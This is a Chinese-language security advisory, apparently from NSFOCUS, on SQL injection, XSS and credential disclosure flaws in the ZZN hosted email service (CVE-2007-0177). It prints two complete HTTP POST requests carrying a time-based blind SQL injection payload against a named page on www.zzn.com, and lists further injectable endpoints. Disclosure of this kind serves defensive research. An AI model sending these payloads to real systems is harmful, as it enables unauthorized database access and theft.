首页 -> 安全研究

安全研究

安全漏洞
ZZN SQL注入/XSS/凭证泄露漏洞

发布日期:2013-08-09
更新日期:2013-08-09

受影响系统:
zzn zzn
描述:
CVE(CAN) ID: CVE-2007-0177

ZZN是虚拟主机电子邮件服务。

ZZN在实现上存在多个XSS、远程盲SQL注入、凭证泄露漏洞,这些漏洞可导致远程攻击者执行未授权数据库操作等。

<*来源:Juan Carlos García
  
  链接:http://packetstormsecurity.com/files/122763/ZZN-SQL-Injection-XSS-Credential-Disclosure.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

1-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --

POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com

%2fmembersarea_en&SpamCopy=&SpamEmail=sample@email.tst&VirtIP=



2-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --

POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Length: 280
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com

%2fmembersarea_en&SpamCopy=&SpamEmail=sample@email.tst&VirtIP=

Proof Of Concept
----------------

These files have at least one input (GET or POST).


/membersarea_en/home.asp - 3 inputs

/membersarea_en/joinframes.asp - 2 inputs

/membersarea_en/emailaccount.asp - 4 inputs

/membersarea_en/preminder.asp - 1 inputs

/membersarea_en/signup.asp - 2 inputs

/membersarea_en/support.asp - 1 inputs

/membersarea_en/insidelogin.asp - 2 inputs

/membersarea_en/directemailerror.asp - 1 inputs

/membersarea_en/alertwindow.asp - 1 inputs

/membersarea_en/loginerror.asp - 1 inputs

/membersarea_en/support_abuse.asp - 1 inputs

/membersarea_en/copy%20of%20emailaccount.asp - 1 inputs

/membersarea_en/directregister.asp - 1 inputs

/zlog - 1 inputs

/zlog/blog_error.asp - 1 inputs

建议:
厂商补丁:

zzn
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.zzn.com

浏览次数:3746
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障